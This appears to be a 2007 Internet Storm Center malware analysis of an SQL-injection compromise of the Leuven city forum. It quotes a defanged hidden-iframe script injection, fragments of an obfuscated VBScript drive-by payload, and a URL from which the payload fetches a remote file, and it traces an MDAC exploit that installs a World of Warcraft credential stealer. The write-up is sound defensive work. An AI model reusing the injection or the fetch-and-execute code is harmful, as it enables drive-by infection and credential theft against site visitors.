Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as succesful as we've hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may feel like filtering the malicious URL mentioned.
At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".
Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www xvgaoke.cn /ms/ltxs.js
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
For i = 1 To Len(x) Step 4
If Mid(x, i, 4) = "0D0A" Then
decode = decode & vbCrLf
decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a vbs file and executed. However, that's not what we want to do here, since the script says EXECUTE. Not a good idea.
So, let's change these commands around a bit. Wscript contains a function that allows you to echo content to the screen in a message box:
Executing the script through wscript then results in some more VBScript which includes the following code:
on error resume next
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access component (MDAC). On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control part of the ActiveX Data Objects (ADO), referenced in the exploit code above. Today still, this vulnerability is commonly exploited as part of so-called drive by exploits.
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it’s quite common for people running such malicious web server to change their malcode every so often as to reduce the risk of getting detected by anti-virus.
Once run on a system, the software drops a number of executables and installs one of them as a userinit value under the winlogon process. This makes for one of those pesty-difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
If you're still wondering why these are so prized, run this small google query. On-line games such as WoW have recently begun to implement the concept of Real Money Transactions - yes, real money you can lose by getting compromised and others can gain.
So this leaves me wondering why exactly this was a non-malicious compromise ?
Aug 28th 2007
1 decade ago